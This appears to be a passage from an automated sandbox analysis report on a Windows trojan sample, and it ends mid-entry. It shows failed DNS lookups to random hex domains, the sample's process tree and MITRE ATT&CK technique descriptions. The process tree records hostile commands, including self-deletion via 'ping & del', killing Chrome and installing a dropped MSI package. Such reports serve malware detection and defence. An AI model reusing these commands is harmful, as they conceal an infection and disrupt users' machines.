Apr 12, 2021 13:15:27.555502892 CEST	8.8.8.8	192.168.2.6	0x2594	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.613778114 CEST	8.8.8.8	192.168.2.6	0x373e	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:27.673024893 CEST	8.8.8.8	192.168.2.6	0x1ef2	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.550905943 CEST	8.8.8.8	192.168.2.6	0x8486	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.617341042 CEST	8.8.8.8	192.168.2.6	0x21dd	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.690270901 CEST	8.8.8.8	192.168.2.6	0xe6b9	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.756274939 CEST	8.8.8.8	192.168.2.6	0xfd9f	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.823908091 CEST	8.8.8.8	192.168.2.6	0xeba4	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:31.891380072 CEST	8.8.8.8	192.168.2.6	0xbe1a	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.028791904 CEST	8.8.8.8	192.168.2.6	0x4d5a	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.115395069 CEST	8.8.8.8	192.168.2.6	0xe43	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.189440966 CEST	8.8.8.8	192.168.2.6	0x8c84	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.250993013 CEST	8.8.8.8	192.168.2.6	0xef61	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.349026918 CEST	8.8.8.8	192.168.2.6	0xc7b0	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.419326067 CEST	8.8.8.8	192.168.2.6	0xfaae	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.489864111 CEST	8.8.8.8	192.168.2.6	0xae05	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:32.553649902 CEST	8.8.8.8	192.168.2.6	0xae59	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.137182951 CEST	8.8.8.8	192.168.2.6	0x6e94	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.194175005 CEST	8.8.8.8	192.168.2.6	0x6559	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.265013933 CEST	8.8.8.8	192.168.2.6	0xdf75	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.336049080 CEST	8.8.8.8	192.168.2.6	0x1e3d	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.406616926 CEST	8.8.8.8	192.168.2.6	0xdedb	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.483098030 CEST	8.8.8.8	192.168.2.6	0xb121	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.559887886 CEST	8.8.8.8	192.168.2.6	0x9271	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.648308992 CEST	8.8.8.8	192.168.2.6	0xdc3c	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.721612930 CEST	8.8.8.8	192.168.2.6	0x31fa	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.792784929 CEST	8.8.8.8	192.168.2.6	0xe900	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.865225077 CEST	8.8.8.8	192.168.2.6	0x7a90	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:33.939807892 CEST	8.8.8.8	192.168.2.6	0x8391	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.003313065 CEST	8.8.8.8	192.168.2.6	0x192b	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.072362900 CEST	8.8.8.8	192.168.2.6	0x7820	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.131834984 CEST	8.8.8.8	192.168.2.6	0x7a3	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.222738981 CEST	8.8.8.8	192.168.2.6	0x935c	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.289136887 CEST	8.8.8.8	192.168.2.6	0x9b26	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.359421968 CEST	8.8.8.8	192.168.2.6	0x78e9	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.429187059 CEST	8.8.8.8	192.168.2.6	0xad6b	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.514575958 CEST	8.8.8.8	192.168.2.6	0xee73	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:34.581497908 CEST	8.8.8.8	192.168.2.6	0xe6cb	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.709584951 CEST	8.8.8.8	192.168.2.6	0x3419	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.768702984 CEST	8.8.8.8	192.168.2.6	0x297a	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.824040890 CEST	8.8.8.8	192.168.2.6	0xd191	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.880275965 CEST	8.8.8.8	192.168.2.6	0x687	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:51.940763950 CEST	8.8.8.8	192.168.2.6	0xc272	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:52.012754917 CEST	8.8.8.8	192.168.2.6	0xb709	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:52.077620983 CEST	8.8.8.8	192.168.2.6	0x435b	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:57.983031034 CEST	8.8.8.8	192.168.2.6	0x4f7d	Name error (3)	9ED2FEEA30C3CC5D.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:58.165599108 CEST	8.8.8.8	192.168.2.6	0xfe94	Name error (3)	55BE681FC6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:58.339704037 CEST	8.8.8.8	192.168.2.6	0x6677	Name error (3)	61D53B5A4BC1AB86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:58.497509956 CEST	8.8.8.8	192.168.2.6	0x997c	Name error (3)	C431A802FF4A46B5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:58.762681007 CEST	8.8.8.8	192.168.2.6	0x1d44	Name error (3)	84B5A35D6E5335EF.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:15:59.195682049 CEST	8.8.8.8	192.168.2.6	0xe2be	Name error (3)	BDC347C728B2D94D.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:16:00.124286890 CEST	8.8.8.8	192.168.2.6	0xce51	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe PID: 6484 Parent PID: 5976

General

Start time:	13:15:09
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.355375911.00000000025D0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: msiexec.exe PID: 6620 Parent PID: 6484

General

Start time:	13:15:13
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase:	0x1d0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: msiexec.exe PID: 6780 Parent PID: 2408

General

Start time:	13:15:14
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 97BC0791AD59D06459021C46045665AB C
Imagebase:	0x1d0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 26FF190E7AE0F7C7.exe PID: 6852 Parent PID: 6484

General

Start time:	13:15:16
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000006.00000002.438715489.0000000002660000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 28%, Metadefender, Browse Detection: 65%, ReversingLabs
Reputation:	low

Analysis Process: 26FF190E7AE0F7C7.exe PID: 6868 Parent PID: 6484

General

Start time:	13:15:17
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000007.00000002.369233907.00000000025B0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: cmd.exe PID: 6900 Parent PID: 6484

General

Start time:	13:15:18
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6908 Parent PID: 6900

General

Start time:	13:15:19
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: PING.EXE PID: 6940 Parent PID: 6900

General

Start time:	13:15:20
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x190000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 1618258522437.exe PID: 7000 Parent PID: 6852

General

Start time:	13:15:22
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Roaming\1618258522437.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1618258522437.exe' /sjson 'C:\Users\user\AppData\Roaming\1618258522437.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 7060 Parent PID: 6868

General

Start time:	13:15:23
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c taskkill /f /im chrome.exe
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7084 Parent PID: 7060

General

Start time:	13:15:24
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskkill.exe PID: 4568 Parent PID: 7060

General

Start time:	13:15:26
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im chrome.exe
Imagebase:	0xde0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 3688 Parent PID: 6868

General

Start time:	13:15:26
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5712 Parent PID: 3688

General

Start time:	13:15:27
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 5092 Parent PID: 3688

General

Start time:	13:15:27
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x190000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: ThunderFW.exe PID: 5928 Parent PID: 6852

General

Start time:	13:15:51
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase:	0xb90000
File size:	73160 bytes
MD5 hash:	F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 2%, ReversingLabs

Analysis Process: cmd.exe PID: 6692 Parent PID: 6852

General

Start time:	13:15:59
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6696 Parent PID: 6692

General

Start time:	13:15:59
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 4936 Parent PID: 6692

General

Start time:	13:16:00
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x190000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Browser extensions, File monitoring, Process monitoring, Process use of network, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
